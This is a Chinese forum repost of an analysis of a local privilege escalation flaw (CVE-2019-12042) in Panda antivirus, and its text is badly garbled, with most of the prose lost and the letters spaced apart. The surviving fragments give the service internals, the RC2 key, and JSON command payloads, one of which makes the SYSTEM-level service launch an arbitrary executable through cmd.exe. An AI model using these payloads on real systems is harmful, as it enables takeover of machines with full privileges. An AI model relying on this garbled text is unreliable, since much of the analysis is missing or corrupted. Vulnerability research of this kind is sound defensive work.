搜索

[14348] 2019-07-14_挖洞经验Panda反病毒软件本地提权漏洞分析

文档创建者:s7ckTeam
浏览次数:29
最后更新:2025-01-18
2019-07-14_挖洞经验Panda反病毒软件本地提权漏洞分析   |   P a n d a A l p h a _ h 4 c k   F r e e B u f   2 0 1 9 - 0 7 - 1 4 P a n d a C V E - 2 0 1 9 - 1 2 0 4 2 S Y S T E M P a n d a   D o m e <   1 8 . 0 7 . 0 3 P a n d a   I n t e r n e t S e c u r i t y P a n d a   A n t i v i r u s   P r o P a n d a G l o b a l P r o t e c t i o n P a n d a   G o l d   P r o t e c t i o n P a n d a   A n t i v i r u s   < =   1 5 . 0 . 4 v 1 8 . 0 7 . 0 3 A g e n t S v c . e x e S e c t i o n 便 E v e r y o n e
线 线 使 2 u n i c o d e 使 w s t r i n g A N S I 5 0 使 3 s a 3 4 2 Z v S f B 6 8 a E q A N S I D e c o d e A n d D e c r y p t D a t a b a s e 6 4 使 R C 2 3 s a 3 4 2 Z v S f B 6 8 a E q R C 2 使 B a s e 6 4 t y p e d e f   s t r u c t   S t d L i s t _ E v e n t {               s t r u c t   S t d L i s t _ E v e n t *   N e x t ;               s t r u c t   S t d L i s t _ E v e n t *   P r e v i o u s ;               s t r u c t   c _ s t r i n g             {                       u n i o n                     {                                   c h a r *   p S t r ;                                   c h a r   s t r [ 1 6 ]                       } ;                       u n s i g n e d   i n t   L e n g t h ;                       u n s i g n e d   i n t I n S t r u c t u r e S t r i n g M a x L e n ;               } D i p s a t c h e r E v e n t S t r i n g ;               / / . . } ;
w s t r i n g d o - w h i l e | 线 D i s p a t c h e r . d l l C D i s p a t c h e r I n s e r t E v e n t D i s p a t c h e r . d l l C D i s p a t c h e r : : I n s e r t E v e n t C Q u e u e
C D i s p a t c h e r : : R u n 线 C R e g i s t e r P l u g i n : : P r o c e s s E v e n t J S O N j s o n - p a r s e r
J S O N C D i s p a t c h e r : : I n i t i a l i z e C R e g i s t e r P l u g i n s : : L o a d A l l P l u g i n s P a n d a 访 D L L D L L P l u g i n _ C o m m a n d s . d l l D L L P l u g i n _ C o m m a n d s . d l l R u n J S O N J S O N
西 R u n U R L 使 f i l e : / / U R I E x e N a m e S o u r c e P a t h

C m d L i n e E x e c u t e E x e M D 5 M D 5 C h e c k M D 5 M a t c h J S O N J S O N R C 2 + B a s e 6 4 c m d . e x e S Y S T E M {         " C m d L i n e E x e c u t e " :                         {                 " E x e N a m e " : " c m d . e x e " ,                                                                       " S o u r c e P a t h " : " f i l e : / / C : W i n d o w s S y s t e m 3 2 " ,                                                 " E x e M D 5 " : " f e f 8 1 1 8 e d f 7 9 1 8 d 3 c 7 9 5 d 6 e f 0 3 8 0 0 5 1 9 "         } }
P a n d a 使 c m d . e x e J S O N c m d . e x e M D 5 J S O N P o C W i n d o w s P o C h t t p s : / / g i t h u b . c o m / S o u h a i l H a m m o u / P a n d a - A n t i v i r u s - L P E *   r c e 4 f u n F B A l p h a _ h 4 c k F r e e B u f . C O M } {         " C m d L i n e E x e c u t e " :                                                                               {                 " E x e N a m e " : " c m d . e x e " ,                                                                     " P a r a m e t e r s " :   " / c   s t a r t C : U s e r s V M D e s k t o p r u n _ m e _ a s _ s y s t e m . e x e " ,                 " S o u r c e P a t h " : " f i l e : / / C : W i n d o w s S y s t e m 3 2 " ,                                               " E x e M D 5 " : " f e f 8 1 1 8 e d f 7 9 1 8 d 3 c 7 9 5 d 6 e f 0 3 8 0 0 5 1 9 "   / / M D 5   h a s h   o f   C M D . E X E         } }

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理